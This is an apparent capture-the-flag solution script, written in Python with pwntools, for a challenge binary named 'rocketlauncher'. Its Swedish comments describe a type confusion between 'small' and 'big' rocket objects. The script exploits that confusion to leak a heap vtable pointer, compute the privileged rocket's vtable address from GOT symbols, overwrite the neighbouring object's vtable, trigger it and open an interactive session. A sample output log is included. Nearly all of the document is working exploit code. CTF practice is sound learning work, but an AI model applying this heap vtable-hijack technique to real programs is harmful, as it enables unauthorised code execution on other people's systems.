from pwn import *
from tqdm import tqdm
context.terminal = [ "ghostty", "-e" ]

# p = remote("undutmaning-rocketlauncher.chals.io", 443, ssl=True)
p = process("./rocketlauncher")
# p = gdb.debug("./rocketlauncher")
elf = ELF("./rocketlauncher")

"""
ide: ändra en small rocket som om den vore big så får man skriva över saker som kommer efter

om två small rockets allokerats: efter den förstá small rocket kommer nästa small rockets vtable.
skriv över den till privileged rockets vtable och sen launcha den. mellan kommer dock malloc-
bookkeeping, den andra ligger 48 bytes senare

    struct BigRocket                struct SmallRocket
    {                               {
0       void* vtable;                   void* vtable;
8       struct part part_1;             int32_t pad; int32_t type;
16      struct part part_2;             struct part part_1;
24      struct part part_3;             struct part part_2;
32      struct part part_4;         }; 
40      struct part part_5;         struct SmallRocket {
48      struct part part_6;             void* vtable;
56      struct part part_7;             int32_t pad; int32_t type;
64      struct part part_8;             struct part part_1;
72      int32_t type;                   struct part part_2;
    };                              }; 
"""

p.sendlineafter(b"> ", b"1")
p.sendlineafter(b"> ", b"small")
for _ in range(4): p.sendlineafter(b"= ", b"1")

p.sendlineafter(b"> ", b"1")
p.sendlineafter(b"> ", b"small")
for _ in range(4): p.sendlineafter(b"= ", b"1")

p.sendlineafter(b"> ", b"1")
p.sendlineafter(b"> ", b"small")
for _ in range(4): p.sendlineafter(b"= ", b"1")


p.sendlineafter(b"> ", b"2")
p.sendlineafter(b"> ", b"big")
p.sendlineafter(b"> ", b"0")

for i in (range(16)):
    prev = int(p.readuntil(b" = ").split(b"previously ")[1].split(b")")[0])
    p.sendline(f"{prev}".encode())
    if i == 9:
        vtable_small_lower = prev
    if i == 10:
        vtable_small_upper = (prev + 2**32) % (2**32)

vtable_small = vtable_small_lower + (vtable_small_upper << 32)

vtable_privileged = vtable_small + elf.sym["got._ZN16PrivilegedRocket12LaunchRocketEv"] - elf.sym["got._ZN11SmallRocket12LaunchRocketEv"]

p.sendlineafter(b"> ", b"2")
p.sendlineafter(b"> ", b"big")
p.sendlineafter(b"> ", b"0")

for i in range(16):
    val = int(p.readuntil(b" = ").split(b"previously ")[1].split(b")")[0])
    if i == 9:
        val = vtable_privileged & 0xff_ff_ff_ff
    if i == 10:
        val = vtable_privileged >> 32
    p.sendline(f"{val}".encode())

p.sendlineafter(b"> ", b"3")
p.sendlineafter(b"> ", b"1")

p.interactive()

"""
 0: 1: Main Engine width (previously 2) = 1
 1: 1: Main Engine height (previously 1) = 1
 2: 2: Hull width (previously 1) = 1
 3: 2: Hull height (previously 1) = 1
 4: 3: Booster width (previously 1) = 1
 5: 3: Booster height (previously 0) = 1
 6: 4: Igniter width (previously 0) = 1
 7: 4: Igniter height (previously 49) = 1
 8: 5: Vertical Tail width (previously 0) = 1
 9: 5: Vertical Tail height (previously 1843891160) = 1
10: 6: Payload width (previously 21860) = 1
11: 6: Payload height (previously 0) = 1
12: 7: Delta Wing width (previously 2) = 1
13: 7: Delta Wing height (previously 1) = 1
14: 8: Safety Hatch width (previously 1) = 1
15: 8: Safety Hatch height (previously 1) = 1
"""
